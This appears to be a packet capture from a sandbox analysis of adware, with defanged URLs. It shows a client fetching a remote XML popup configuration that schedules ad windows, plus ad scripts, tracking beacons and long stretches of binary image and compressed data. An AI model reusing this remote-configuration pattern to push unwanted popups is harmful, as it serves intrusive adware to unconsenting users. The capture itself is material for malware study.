%.sI.V..?~.}.e.#3.Q}..B..W.L..I}..}....4.4..{..k73....5"_.A.h(..PH..&l
t;J..O(.vv.a*.c.n..5.H.5.. ..U.m5.e8.....r....._.....A.5.._.s...eJHc.c
.%uv..@|..^!....0.XC.|:\Y2G."..............F..&.-._......T.qel.4...~r.
..o......$..gI. ..=.K*S/...v.\./......o...~..jv...n)|.d=.R......:.....
(.3=...C)|..g.lD.j..........y......-..p...,.C_....Y......P.....;...:p.
..@{.~..u...[3Up..M........&...V.Y:..N..`66.......,.....J.....'R......
6.........)....c..K.../..........)..s[.r.h...)N.U .......F9=.d..*>.
..l.q.}....A....0....../V......3.wy|..........q:.....s.w.'.r. .C..wh|.
..K...g...e...3.H...].<......].Iu.....x...f..{......7"......;......
.....k...`=..D.:.7.fu.....T......`r:...Yy.... .1....a^...o......A.cJL.
.....}.4c...oIT.9...!........k.....U....a&....H..][email protected]..
.$.....R'.}.#._N)....8.|..L..<pON9....F.....j*....`|j.....y].......
..h..p'..y...O.....$.X........~......S....:.yF~"o.7.$x"......2..Ss~.t.
...B.......l.&.[....s$..4.#....W.....ho^..........T.c.K ....&./"..)../
.}...h..!^ "u.r..j....G....E./Mg...$..LF; .>_.......9.~DZ1..<.&l
t;gb.......6...e..3..TA....-.F.>..==.....o.p......J.<..nG.%.<<< skipped >>>

GET /web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000 HTTP/1.1

User-Agent: Crazyk

Host: stat.fjmjm.com

Cookie: ASPSESSIONIDCASRABDR=LEOJDCNAGKHOKODEHLAIDLMF


HTTP/1.1 200 OK

Server: ASERVER/1.2.9-3

Date: Sun, 01 Jun 2014 03:33:09 GMT

Content-Type: text/html

Content-Length: 4659

Connection: keep-alive

Who: ShanIE

Cache-control: private

X-Powered-By-Anquanbao: MISS from chn-yz-yj-sb2
..<?xml version="1.0" encoding="gb2312"?>..<SoftwareConfig>
;..  <Version>20140601113322</Version>..  <Popwin>..
.    <Item id="1">..      <Subject>........</Subject>
;..      <WinWidth>708</WinWidth>..      <WinHeight>
404</WinHeight>..      <StartUpPosition>0</StartUpPosit
ion>..      <URL>hXXp://VVV.mdtxw.org/miniindex/</URL> 
..      <StartUpTime>10</StartUpTime>..      <ShowIntev
al>7200</ShowInteval>..      <AutoClose>600</AutoClo
se>..      <isShow>1</isShow>..    </Item>..    &
lt;Item id="2">..      <Subject>........</Subject>..   
  <WinWidth>300</WinWidth>..      <WinHeight>265<
/WinHeight>..      <StartUpPosition>1</StartUpPosition>
..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140601113322&
lt;/URL> ..      <StartUpTime>50</StartUpTime>..      &
lt;ShowInteval>0</ShowInteval>..      <AutoClose>50<
/AutoClose>..      <isShow>1</isShow>..    </Item>
;..    <Item id="3">..      <Subject>....LB</Subject>
;..      <WinWidth>300</WinWidth>..      <WinHeight>
265</WinHeight>..      <StartUpPosition>1</StartUpPosit
ion>..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140601
113322</URL>..      <StartUpTime>200</StartUpTime>..
      <ShowInteval>7200</ShowInteval>..      <AutoC<<< skipped >>>

GET /a/cpv1.html?t=20140601113322 HTTP/1.1

User-Agent: hello crazyk

Host: stat.fjmjm.com

Cookie: ASPSESSIONIDCASRABDR=LEOJDCNAGKHOKODEHLAIDLMF


HTTP/1.1 200 OK

Server: ASERVER/1.2.9-3

Date: Sun, 01 Jun 2014 03:34:00 GMT

Content-Type: text/html

Content-Length: 1117

Connection: keep-alive

Last-Modified: Sun, 11 May 2014 18:17:40 GMT

Accept-Ranges: bytes

ETag: "0ba444b456dcf1:420"

Who: ShanIE

X-Powered-By-Anquanbao: MISS from chn-yz-yj-sb2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> ..<html&g
t;..<head>..<meta http-equiv="Content-Type" content="text/htm
l; charset=gb2312">..<meta http-equiv="cache-control" content="n
o-cache">..<title>..</title>..<style>..*{margin:0
;padding:0;position:relative;top:0;left:0;}..body{font-size:13px;}..a{
color:black;text-decoration:none;border:0px}..#popwin{margin:0 auto;wi
dth:300px;height:265px;border:0px;}..#title{width:auto;height:12px;}..
#title a.btn-close{position:relative;left:230px;width:39px;height:12px
;display:block;}...adright{float:right;width:300px;height:15px;border:
0px} ..</style>..</head>..<body>..<div id="popwin
">..<div class="adright"><p align="right"><a onclick
="window.external.CloseWindow();"><img src="Close.gif"></a
></p></div>..<div id="gList">..<script src="ht
tp://e.70e.com/cpc_img.asp?u=34496&m=6&n=1719,1685,1706,1707,1718&s_px
=1" charset="gb2312"></script>..</div>..</div>..&
lt;script type="text/javascript" src="hXXp://lg1236.565882.com/pShow.p
hp?PID=5534"></script>..<div style="display:none"></
div>..</body>..</html>..<<< skipped >>>

GET /favicon.ico HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Pragma: no-cache

Cache-Control: no-cache

Connection: Close

Host: VVV.fjmjm.com


HTTP/1.1 404 Not Found

Server: ASERVER/1.2.9-3

Date: Sun, 01 Jun 2014 03:33:12 GMT

Content-Type: text/html

Content-Length: 83

Connection: close

Who: ShanIE

X-Powered-By-Anquanbao: MISS from chn-yz-yj-sb2
<html><head><title>Error</title></head>&
lt;body>........................</body></html>..

GET /images/d.gif HTTP/1.1

Accept: */*

Referer: hXXp://e.70e.com/code/cpc_swf.asp?s_noadid=1719,1685,1706,1707,1718&s_width=300&s_height=250&s_id=34496&s_attrib=0&ref=&l=1

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: f.70e.com

Connection: Keep-Alive

Cookie: Swf70Rid=1; stat.fjmjm.com=0; dq_0=0


HTTP/1.1 200 OK

Content-Type: image/gif

Last-Modified: Wed, 21 Dec 2011 15:34:27 GMT

Accept-Ranges: bytes

ETag: "faeb846f6bfcc1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 01 Jun 2014 03:34:09 GMT

Content-Length: 43

GIF89a.............!.......,...........D..;..

GET /9.gif?abc=1&rnd=1384439699 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cnzz.mmstat.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:51 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3; expires=Wed, 29-May-24 03:33:51 GMT; path=/; domain=.mmstat.com

Set-Cookie: sca=a689f0ca; path=/; domain=.cnzz.mmstat.com

Set-Cookie: atpsida=e316dfecd498a83144c0e6f9_1401593631; expires=Wed, 29-May-24 03:33:51 GMT; path=/; domain=.cnzz.mmstat.com

Location: hXXp://pcookie.cnzz.com/app.gif?&cna=H40RDLEq1ksCAbhrJiZN4/ 3

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache
GIF89a.............!.......,...........L..;....


GET /9.gif?abc=1&rnd=1755494700 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cnzz.mmstat.com

Connection: Keep-Alive

Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3; sca=a689f0ca; atpsida=e316dfecd498a83144c0e6f9_1401593632


HTTP/1.1 302 Found

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:56 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: atpsida=e316dfecd498a83144c0e6f9_1401593636; expires=Wed, 29-May-24 03:33:56 GMT; path=/; domain=.cnzz.mmstat.com

Location: hXXp://pcookie.cnzz.com/app.gif?&cna=H40RDLEq1ksCAbhrJiZN4/ 3

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache
GIF89a.............!.......,...........L..;....


GET /9.gif?abc=1&rnd=2114589013 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cnzz.mmstat.com

Connection: Keep-Alive

Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3; sca=a689f0ca; atpsida=e316dfecd498a83144c0e6f9_1401593636


HTTP/1.1 302 Found

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:59 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: atpsida=e316dfecd498a83144c0e6f9_1401593639; expires=Wed, 29-May-24 03:33:59 GMT; path=/; domain=.cnzz.mmstat.com

Location: hXXp://pcookie.cnzz.com/app.gif?&cna=H40RDLEq1ksCAbhrJiZN4/ 3

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

GIF89a.............!.......,...........L..;..

GET /core.php?web_id=5645354&t=z HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:50 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Sun, 01 Jun 2014 03:33:50 GMT

Expires: Sun, 01 Jun 2014 03:48:50 GMT
31e..!function(){var a,b,c,d=encodeURIComponent,e="5645354",f="",g="",
h="online_v3.php",i="z12.cnzz.com",j="1",k="text",l="z",m="站
8271;统计",n=window["_CNZZDbridge_" e].bobject,o="https:"=
=document.location.protocol?"https:":"http:",p="0",q=o "//online.cnzz.
com/online/" h,r=[];r.push("id=" e),r.push("h=" i),r.push("on=" d(g)),
r.push("s=" d(f)),q ="?" r.join("&"),"0"===p&&n.callRequest([o "//cnzz
.mmstat.com/9.gif?abc=1"]),j&&(""!==g?n.createScriptIcon(q,"utf-8"):(b
="z"==l?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" e:"hXXp://quanj
ing.cnzz.com","pic"===k?(c=o "//icon.cnzz.com/img/" f ".gif",a="<a 
href='" b "' target=_blank title='" m "'><img border=0 hspace=0 
vspace=0 src='" c "'></a>"):a="<a href='" b "' target=_bla
nk title='" m "'>" m "</a>",n.createIcon([a])))}();...0..

GET /stat.htm?id=5645354&r=http://VVV.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=3&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17582&sin=none&t=undefinedundefinedundefined&rnd=1579681700 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: hzs10.cnzz.com

Connection: Keep-Alive

Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3


HTTP/1.1 200 OK

Server: Tengine/1.4.1

Date: Sun, 01 Jun 2014 03:33:56 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Tue, 28 May 2013 02:57:17 GMT

Connection: close

Accept-Ranges: bytes

GIF89a.............!.......,...........D..;..

GET /v53/imgn/v53_2icos.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:26 GMT

Content-Type: image/gif

Content-Length: 2051

Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT

Connection: keep-alive

Accept-Ranges: bytes
GIF89a)....................8Y....................1..v...........=.....
.........z....................e........J........}.................8..j
..............u.................r.....Q..............C................
.k...........L........................................................
......................................................................
...............................................!.....N.,....).......NN
5....................N.?N...........I.>[email protected]......
-.......................<*........A..G.%:......#%% .C.......].....I
!JP.....I..a.8....A$.3..B.H.$N\.a %#.#......I4L)..k...&O........{.(7.f
N.:(P.pO.C.!..,.j.....D.'..6.G'A........u-z",..H....q...W.LI]d...J7..8
. .O.x.*..l....Tl...... ..m<a.$.J...d..a...J...s$.$H..e..$^..9...D.
........[k.`.Jbs.qk..nj..Yt........n...c.......uE'.c..n.Q_b.....)..x..
..d.....6e..V.)._c..'....W`...._{.}E.$.` ........,.....@..,.....)..W.M
 ..-....B.8#&..)...y..#..gb.#.|.. K6..*IJ.....R.3U:.%#..Rer_....P.8.9c
.X...8..#_..&.jN.'B>..g.$....G...P1..&0.........MTIb. ....M8!.h....
....*.y`yZ.|.xG.Q6.)k.6.:J_..y.X}....-\..o.05k..L..)...........v.)..HK
.H.....J.....4[.c.*Bn..9.^...[.xw.;...bGo......h.{o...[.%..Xo#...^..d 
S......~..r...*\[email protected]..&F...m...9.h..0..".*.(...:.....s..,.
.2.....!..l.#N.....4y..S32% cr..-bV.,...S.....6.....wn.9&.;LP7..a.wMlV
y...W:....0..<. ../.2x{...(%V.[B.PM..TGu.yV.....$z^9v.J".....@.:0EB
....:. ...]".PW....`.......PP..p..D.%..|...e..>)al....=.._.%...z..O
...n..J.B.........>.....B....62....C.h.k....<@.....B.A...5..<<< skipped >>>

GET /v53/jsn/main.js?V=107ff6db9da3d62875c7cafb326229a51 HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:29 GMT

Content-Type: application/x-javascript

Last-Modified: Thu, 22 May 2014 03:42:23 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip
5507..............{[.G...w.... Y-!q.....0...${..I^`xuiI.BR....:.......
H.;.......?......U.V.V}hN........:.?..Q..~..&.4.....v.a........A.-....
....d....=e..s?..........l.....Xzp..i.....Q...:............E|..^L.....
|.7'q8.Lz...!.L...o....a.._ ..2.e..,......$.|....>]...-/...s.$.4u.@
l....b.....}.\\..`..X.I.....p....:.qR...}....`..>...i.r..sT..|>.
..dX.....65......z7l...L&.O.....?... ......pr0,.K...z\./...~..,..s.&l.
..@....>L->8...^......v...W...J~D.s..,...n|6.._.8.b.9..G...dkN.B
.......n.........l.....l.|_.w.^.|.j...rv~^{C.W;.....5.r/..d..uv..'E...
.$l..h.[..A-..'...7.:.go.).. ..n..i}.../...X......T..U...........c....
E._.....;5` Py0]....vM.;gg....).|U......$.-y.I.f....(..=S..V..v.......
......}.....[.^9......6hb....vX..a...R..c.ze....&=..6g......7('.....dt
_......Q)... l.......Xz........86/.........s_&.C.v9\..:._.....w/.)_. .
^.x.n....K.i.....>........K....uK/.J.Y.......Y.CY.q0)..%?.4}3.a.P..
..qM..!dkui_...d ^"[.. ..[ie5.K<..*..wMCB..j..j.k..........4%B...U!
......n./.......?........>D..5.[.2... ....v.:...L...CG..0.......78.
..{.9..>.....oNz3ax...!3.x..e1....Yd)....J..... ..z...ej.]43l.....N
.F.#.-..L.O.._5I..a3L.....A..:......b.. .j=....6.....Z'.,....\.\D.....
ah%.w....8e.n.....qhh..x.....!4.....(.c......8<5..1..CH......qq.N..
......e...r~Y.,]V/./.u..Lr...LA.f.....!0.z..X..... ..fd....u&B>...!
.....g.8E\.Lx..Hs.....v%^...]......p..........<.s.V.....R...D.I....
.$..b..>........m^n(9.....K.....QjH..h.z..T...).6.....T..k8MH.q...5
2..>.........co}..x.o...<...'..t..L..r.a.&.. !.i..........4.<<< skipped >>>

GET /v53/imgn/guide_tip.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/png

Content-Length: 10442

Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT

Connection: keep-alive

Accept-Ranges: bytes
.PNG........IHDR.......J.......D.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5.1 Macintosh" xmpMM:InstanceID="xmp.iid:CEC0416D02FB11E388CB8B
2E3040A42A" xmpMM:DocumentID="xmp.did:CEC0416E02FB11E388CB8B2E3040A42A
"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CEC0416B02FB11E3
88CB8B2E3040A42A" stRef:documentID="xmp.did:CEC0416C02FB11E388CB8B2E30
40A42A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta&
gt; <?xpacket end="r"?>.Z....%<IDATx..].....&.(..."...ky.....
.f...7..........W@%.`..@A.*(...P..;K......E|..;g.....?[....>.<..
...........i......h-....@_~.. _&.2%...<..........k......w.d./.....U
 8..r./=|..9.{.P .IT.r.J.b].|...3|....../7....]1..=?..M]Y.f.....n...7l
.:w......Vk?.gkk 8.z..........ps...^p........P-....Z..._.6l.....KWWW.j
jj...........Q..P.~.|..Y..O......... .}...GI...3k..#......KS.....n..r.
rm..../.....'JUUU..aIT....V......4...]P.......M.....Y..xju6...2...|.o3
......?...>X\..V[[......}(//........o.CEM...f.N..Z.....O. ..7hU.qC=
p&/........@.|'gA.1.>.$....{@t..P...um..A..8..].v.;..D.b.]..ss.<<< skipped >>>

GET /js/jquery-1.7.2.min.js HTTP/1.1

Accept: */*

Referer: hXXp://e.70e.com/code/cpc_swf.asp?s_noadid=1719,1685,1706,1707,1718&s_width=300&s_height=250&s_id=34496&s_attrib=0&ref=&l=1

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: e.70e.com

Connection: Keep-Alive

Cookie: ASPSESSIONIDQCDBQARB=PMFGHAABLABHAAEMIIAHDLDB; Swf70Rid=1; stat.fjmjm.com=0; dq_0=0


HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Encoding: gzip

Last-Modified: Wed, 21 Mar 2012 19:46:56 GMT

Accept-Ranges: bytes

ETag: "0b8125f9b7cd1:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 01 Jun 2014 03:34:06 GMT

Content-Length: 42677
.............`.I.%&/m.{.J.J..t...`[email protected]#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?".~.wM..'.y}.^........E.k<...
..?...nYL.e.....l.......[.hr.......Vv...y......h.[,g..}.{d......o.W.g.
}.......<[..O.....L6^eu.l..G.../qP......[......}../...t..t<.f...
g.[.=.......>.3.V.|9{SmM....f.i.l}4 .U.].t.p6..Eu.o.9$....e..?.....
?....o..g..o.....6?-.....Qq^g...;...1....gy...yU..9~......l..h.....rF.
...uZ........}gZ~F-..........L.'O.....g..hZ..........z.........p.{|..w
..-Q:......G4.O>z..<...R.1-....}.?|[email protected]...]......\}
........S......~......8........f-z-......}....v..;#.b...{..h..Y.K...n.
..4.E.M..j....7."........W...lI.z.{........2.J..1}y..._N~:.q|.E1...:o.
..........h.YK.......<......UN.....'D..._L".....l.......g..[......s
....i.|....._2...G..E.//....Go?.}o...r..-G.hux^.[....^<../>..%..
.c.........I..k....>...9.O.....#.-..|.V....>..c4K.K.....a..[....
.....G.........$=C... ....!~y{../> ?.(......g....'...G.....w].....&
<..x.w~.O.V..I......Z.4..."I............}...Vw~qE.V..U..w..=......W
........d../..w].._...~./$6.k....U*.m0..5i..>Y...../S/...."....4:.9
.l.{,..w...*.q../...qC.n..Dxr. .D3:.?.|_._u..*......5.{L9S........:...
........{....9.:w."=3/...;#...&..../H......E......g...>R...#4RPu.l.
..w..........[......x....Ccj.d........2..b...Am~W|.kB=......S|A...? ."
.....;...?.........{..4.T.$~.....~...`N~....L....w\..5./.....)....q.3?
3y*#%.8...;........'[ ......*V/........h.sO..0r...:..x.z.Y1.0..;@....?
g8....V......O.M~7............Og.^.mK.......r......t7.6CO.;....O..<<< skipped >>>

GET /imgu/2014/05/20140508103513_537.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p4.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: image/gif

Content-Length: 21959

Last-Modified: Thu, 08 May 2014 02:35:13 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:25 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
GIF89ai......SSS.ww........\.......c;/.W...i......C.hhh.R.............
.........................vE.....................-.......Z...bbb~~~.=..
...]8....t...."*........dd.......A....S............%..............D..=
....DDD.K.....kH.....h...................BB...)1.TZ........$$.SSJJJ.::
...qqqdj..........\c..........4<......4vvv.,,.22.ZZ.......j .......
............nn......ty.>>>....z\lll..........]#....KK........
.....qR.L$....f ............:B...x......................R,......yyyCJ.
...........{.....b%-............mh...n7.....r...JQ.....a'.K..~O.6.....
...}`.....c......lq....}............G.....R$.....p.E...b.....m~...V..^
 .G...z..s.......vW.}Z.G.....P......~.Z0.............9..............D.
@[email protected]'/..>>.K..F.. ....\s..............
XL.....w....,&..f.....h......!..XMP DataXMP<?xpacket begin="..." id
="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/
" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27     
   "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-synta
x-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.ado
be.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/Res
ourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocu
mentID="xmp.did:491CD10DA3D5E311A958EE854ABCD7D0" xmpMM:DocumentID="xm
p.did:4C40E5B5D5E411E3B4278899C73C6A8E" xmpMM:InstanceID="xmp.iid:4C40
E5B4D5E411E3B4278899C73C6A8E" xmp:CreatorTool="Adobe Photoshop CS6 (Wi
ndows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9908CF<<< skipped >>>

GET /favicon.ico HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Pragma: no-cache

Cache-Control: no-cache

Connection: Close

Host: 123.sogou.com


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:34 GMT

Content-Type: image/x-icon

Content-Length: 1150

Connection: close

Last-Modified: Wed, 21 Sep 2011 09:58:32 GMT

ETag: "4e79b548-47e"

Expires: Sat, 14 Jun 2014 02:53:46 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
............ .h.......(....... ..... .....@...........................
........ddd.aaa.___.]]].[[[.XXX.VVV.UUU.............................ii
if............................VVV.UUUl....................}}}.........
............................fff.UUU................o..........v..t...q
..........................bbb.UUUQ....xxx...........F..o..............
.y............A.........VVV.UUU....v.........b...{...........}....!...
............ .....~~~.VVVT.........r#..o...w...v...h....E.............
.....w..........XXX..........W...q...h...y(...........................
....U.....[[[..........X...g....E..........................y......../.
....]]]..........g...[........................v..p............G.....__
_...........P..l...................b...o...~.......y..........aaa.....
.........^...............X...s...x...|...|...n..........ddd-..........
...................T...l...o...m...b..........~~~.....................
.................{6..o ...Z.............kkk...........................
..............................qqq............................&........
................... ..................................................
................................

GET /9.gif?abc=1&rnd=2044816123 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cnzz.mmstat.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:51 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=H40RDBRX0EsCAbhrJiYbIGdr; expires=Wed, 29-May-24 03:33:51 GMT; path=/; domain=.mmstat.com

Set-Cookie: sca=35388361; path=/; domain=.cnzz.mmstat.com

Set-Cookie: atpsida=7d3a240d777b1027813d1b07_1401593631; expires=Wed, 29-May-24 03:33:51 GMT; path=/; domain=.cnzz.mmstat.com

Location: hXXp://pcookie.cnzz.com/app.gif?&cna=H40RDBRX0EsCAbhrJiYbIGdr

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache
GIF89a.............!.......,...........L..;....


GET /9.gif?abc=1&rnd=569175671 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cnzz.mmstat.com

Connection: Keep-Alive

Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3; sca=a689f0ca; atpsida=e316dfecd498a83144c0e6f9_1401593631


HTTP/1.1 302 Found

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:52 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: atpsida=e316dfecd498a83144c0e6f9_1401593632; expires=Wed, 29-May-24 03:33:52 GMT; path=/; domain=.cnzz.mmstat.com

Location: hXXp://pcookie.cnzz.com/app.gif?&cna=H40RDLEq1ksCAbhrJiZN4/ 3

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

GIF89a.............!.......,...........L..;..

GET /material/d7/4/a9ac5ed3b828895d94097c8c6faba.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/shehui_509_366.htm?time=undefined

Accept-Language: en-us

